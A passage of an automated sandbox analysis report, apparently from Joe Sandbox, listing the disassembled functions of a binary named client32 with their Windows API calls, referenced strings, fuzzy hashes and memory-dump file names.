Instruction ID: f08385a8bb617954b2cd2726576ece99008d1adff5eca35a278e2890e7046544
Opcode Fuzzy Hash: 7576ffd709fa07716c165fdfc77964d0ed77a62a779ae22b00f69701058f802a
Instruction Fuzzy Hash: 58512C75E102299BDB14DF64CC80BAAB7F8BF88704F54C1D9E589A7244DF71AA848FD0

Function 11017730 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 1101776C
CoUninitialize.OLE32 ref: 1101784C

Strings

PS/2, xrefs: 110177FE
USB, xrefs: 110177C6
Win32_PointingDevice, xrefs: 11017788
HID, xrefs: 110177E2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: HID$PS/2$USB$Win32_PointingDevice
API String ID: 3442037557-1320232752
Opcode ID: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
Instruction ID: 4ae991e8b238cca573096b2fcc20bd372ce19027575c055cb203384996eb618e
Opcode Fuzzy Hash: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
Instruction Fuzzy Hash: 7E316D75A0062B9FDB21CF94CC41BEAB7B4EF09315F0044F5E919AB244EB74EA85CB91

Function 11087640 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,1117CF74,CF3D35D0,1117CF74,?,1104012D,00000000,1117EF18,000000FF,?,1108709A,00000001,?,1104012D), ref: 110876B0
_sprintf.LIBCMT ref: 1108774E
LeaveCriticalSection.KERNEL32(?), ref: 1108775A
LeaveCriticalSection.KERNEL32(00000000,?,1108709A,00000001,?,1104012D), ref: 11087793

Strings

Unable to allocate memory for key[%d] '%s', xrefs: 1108773F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter_sprintf
String ID: Unable to allocate memory for key[%d] '%s'
API String ID: 273088606-3198095033
Opcode ID: 7c9a0859369454fdf33db54d9b83683acc863e7b9ed55f9fc954e71a74ec5ade
Instruction ID: f224a597ec27af80e2b6c93b7afcd8661e7aa9ca0e5fc1b2bfdac02e021eeeac
Opcode Fuzzy Hash: 7c9a0859369454fdf33db54d9b83683acc863e7b9ed55f9fc954e71a74ec5ade
Instruction Fuzzy Hash: 7341B2B5E05A069FD705DF58D880BAAF7E9FF88304F108669E859C7344DB31E820CB91

Function 11033470 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
_strncmp.LIBCMT ref: 11033572

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110334A5

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$_strncmp
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
API String ID: 3653864897-2723064302
Opcode ID: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
Instruction ID: bc9ce7f87aeaad0c1939b1cc53b23d9fe1575812c47fb94f3614b61ec272b28a
Opcode Fuzzy Hash: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
Instruction Fuzzy Hash: 19410632E1425A5FD712CE748CC0BAAB7E99F81316F1446E5E919DF3D0EA31DA488B40

Function 110331B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 110331C4
_strncpy.LIBCMT ref: 11033204
wsprintfA.USER32 ref: 11033272
_strncpy.LIBCMT ref: 110332CA

Strings

%s (%s), xrefs: 11033269

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1

Function 110EB160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110EB1B1
_free.LIBCMT ref: 110EB1CC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
_free.LIBCMT ref: 110EB293

Strings

Error %d getting %s, xrefs: 110EB24D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast
String ID: Error %d getting %s
API String ID: 3888477750-2709163689
Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1

Function 1113F780 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100,?), ref: 1113F7BB
_strrchr.LIBCMT ref: 1113F7CA
_strrchr.LIBCMT ref: 1113F7DA
wsprintfA.USER32 ref: 1113F7F5

Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A

Strings

CLIENT32, xrefs: 1113F7F0, 1113F7FE, 1113F805, 1113F832

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Module_strrchr$FileHandleNamewsprintf
String ID: CLIENT32
API String ID: 2529650285-3575452709
Opcode ID: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
Instruction ID: 412e03c58315fe01b93dc4c6e19b7b9e09016b9ccac3efcd19913ad31261d848
Opcode Fuzzy Hash: c2a49ae62f9c0766f4e7d43f4f0c94c2462831461f20b5692fbc6db37602f5f6
Instruction Fuzzy Hash: 40218B3490126A5BE712DBB48D447EAFFA4DF5231CF0040E9E9D58B245EA705944C7D3

Function 1113F370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
_memmove.LIBCMT ref: 1113F3ED

Strings

Device, xrefs: 1113F394
Windows, xrefs: 1113F399
,,LPT1:, xrefs: 1113F38F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3

Function 111516A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,1101FEBF,000000FF,000000FF,?,?,?,?), ref: 11151708
DeleteObject.GDI32(?), ref: 11151730
CreateSolidBrush.GDI32(?), ref: 11151737

Strings

m_hWnd, xrefs: 111516F3
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 111516EE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BrushCreateDeleteInvalidateObjectRectSolid
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 186785674-2830328467
Opcode ID: 8699e6204389710bd503c95ce9b64f00072ab8e507412ce9e1edded01bb7fad3
Instruction ID: 5dfecede6439e3526eac28c6e259b430bc21cfc487b4970ad53ef8fd5a80a342
Opcode Fuzzy Hash: 8699e6204389710bd503c95ce9b64f00072ab8e507412ce9e1edded01bb7fad3
Instruction Fuzzy Hash: 1911C675700B01ABD661CA69C8C4FDBF7EDAB8D760F004529F67A97280DB70F84187A4

Function 11141070 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114107C
_memset.LIBCMT ref: 11141098
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF

Strings

0, xrefs: 111410A8

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$Count_memset
String ID: 0
API String ID: 162323998-4108050209
Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1

Function 11141100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,00000058,CF3D35D0), ref: 11141118
wsprintfA.USER32 ref: 1114112E

Strings

i < cchBuf, xrefs: 11141145
..\ctl32\util.cpp, xrefs: 11141140
#%d, xrefs: 11141128

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5

Function 110335E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110335F8
GetClassNameA.USER32(?,?,00000400), ref: 11033626

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

ComboBox, xrefs: 11033632
IsWindow(hWin), xrefs: 1103360C
CltAutoLogon.cpp, xrefs: 11033607

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
